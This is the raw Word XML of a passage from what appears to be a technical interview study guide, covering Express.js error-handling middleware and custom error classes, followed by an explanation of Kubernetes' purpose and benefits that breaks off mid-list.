    <w:p w14:paraId="51F3E008"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>It’s a good practice to have a catch-all error handler at the end of your middleware stack. This will catch any errors that weren’t explicitly handled elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E67943"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7AD7E530"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Define your routes and other middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47806E41"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5128B5B"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Catch-all error handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378F06F"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61ACAC03"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res.status(err.status || 500);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384FD930"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res.json({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4BE811"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message: err.message,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D12C803"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error: process.env.NODE_ENV === 'development' ? err : {} // Hide stack trace in production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5490143F"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3665AA27"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753D57E8" w14:textId="77777777" w:rsidR="00612561" w:rsidRPr="00DA2F32" w:rsidRDefault="00612561" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Handling 404 Errors Separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6252E5"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If you want to handle 404 errors separately, you can add a middleware that catches requests that didn’t match any route, and then pass a 404 error to the error-handling middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012FF85"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594E2124"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app.use((req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255A59E4"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 error = new Error('Not Found');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16374451"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error.status = 404;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61448BA6"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next(error); // Pass the 404 error to the error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAE504D"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434B4A27" w14:textId="77777777" w:rsidR="00612561" w:rsidRPr="00DA2F32" w:rsidRDefault="00612561" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Custom Error Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A688C24"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For more granular error handling, you can create custom error classes to represent different types of errors and handle them accordingly in your error-handling middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D50FFA" w14:textId="77777777" w:rsidR="00612561" w:rsidRPr="00DA2F32" w:rsidRDefault="00612561"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5C899C96"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class NotFoundError extends Error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264901AF"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constructor(message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D24C39"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super(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C302A4"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this.status = 404;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4948EA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657EEBE2"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512C23C1"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2564771C"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app.use((req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A3867"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next(new NotFoundError('The requested resource was not found'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469288FB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9DDC8C"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p>
    <w:p w14:paraId="0922DF1F"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app.use((err, req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D67045"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res.status(err.status || 500);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529DCFE5"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highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  res.json({ message: err.message });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D7350" w14:textId="77777777" w:rsidR="00612561" w:rsidRPr="00DA2F32" w:rsidRDefault="00612561"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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B11B7" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD03147" w14:textId="63D02727" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="_Toc178383356"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the error-first callback pattern?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:p w14:paraId="5C4F3DF5" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD37B0B" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="00BB2F17" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCCFFF4" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_Toc178383357"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Good to have</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC3477F" w14:textId="511677D7" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_Toc178383358"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Briefly explain the purpose and benefits of using Kubernetes in container orchestration.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
    </w:p>
    <w:p w14:paraId="1EFBB57E"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes is a powerful open-source platform designed to automate the deployment, scaling, and management of containerized applications. It acts as an orchestrator for containerized applications, ensuring that they run reliably across different environments. Here’s an overview of the purpose and benefits of using Kubernetes in container orchestration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396E5DE5"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Purpose of Kubernetes in Container Orchestration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A14D9BB" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automated Deployment and Scaling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes automates the deployment and scaling of containerized applications. It ensures that the desired number of container instances (pods) are running and scales them up or down based on resource utilization or traffic demands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF1B5F8" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Container Management and Scheduling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes schedules and manages containers across a cluster of machines (nodes). It efficiently allocates resources, ensuring containers are placed on nodes with sufficient resources while optimizing for load balancing and resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDEDF89" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Self-Healing and Fault Tolerance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes automatically detects and replaces failed containers, restarts them, or reschedules them on different nodes if necessary. This self-healing capability ensures that the application remains available and resilient to failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743248BB" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Service Discovery and Load Balancing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes provides built-in service discovery and load balancing. It automatically assigns IP addresses and DNS names to services, enabling seamless communication between containers. It also distributes traffic evenly across containers, ensuring high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481D3674" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Declarative Configuration and Desired State Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes uses a declarative approach, where you define the desired state of your application (e.g., the number of replicas, network policies) in configuration files (usually YAML). Kubernetes continuously monitors the cluster and makes adjustments to ensure the actual state matches the desired state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BED82F" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rolling Updates and Rollbacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes facilitates rolling updates and rollbacks for containerized applications. This allows you to update applications with zero downtime by gradually replacing old containers with new ones. If something goes wrong, Kubernetes can automatically rollback to the previous stable version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7846F5"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Benefits of Using Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00471494" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>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 xml:space="preserve"> Kubernetes enables horizontal scaling of applications, allowing you to add or remove containers based on demand. This ensures that your application can handle varying loads, from small-scale to enterprise-level traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED10B6" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Portability and Flexibility:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes is cloud-agnostic and can run on any infrastructure, whether on-premises, public cloud, or hybrid environments. This portability allows organizations to avoid vendor lock-in and move workloads across different environments as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6F0A2" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>High Availability and Reliability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes ensures high availability by distributing containers across multiple nodes and providing self-healing capabilities. If a node or container fails, Kubernetes automatically restarts or reschedules the workload on a healthy node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A48E6" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Efficient Resource Utilization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes optimizes resource utilization by scheduling containers based on available CPU, memory, and other resources. This allows organizations to run multiple applications on a single cluster, reducing infrastructure costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797B756B" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure Abstraction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes abstracts the underlying infrastructure, allowing developers to focus on application development rather than managing servers, networks, or storage. This abstraction simplifies the deployment and management of complex applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10549039" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microservices Support:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes is well-suited for managing microservices architectures. It allows you to deploy, scale, and manage individual microservices independently, while also facilitating service discovery, load balancing, and inter-service communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D820C" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DevOps and CI/CD Integration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes integrates seamlessly with DevOps tools and CI/CD pipelines, enabling continuous delivery and automated deployment of applications. This accelerates development cycles and improves collaboration between development and operations teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E2C7B2" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security and Compliance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes provides features like Role-Based Access Control (RBAC), network policies, and secrets management to enhance security. It also supports compliance by enabling fine-grained control over access and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213E07D" w14:textId="77777777" w:rsidR="00071A16" w:rsidRPr="00DA2F32" w:rsidRDefault="00071A16" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="621"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
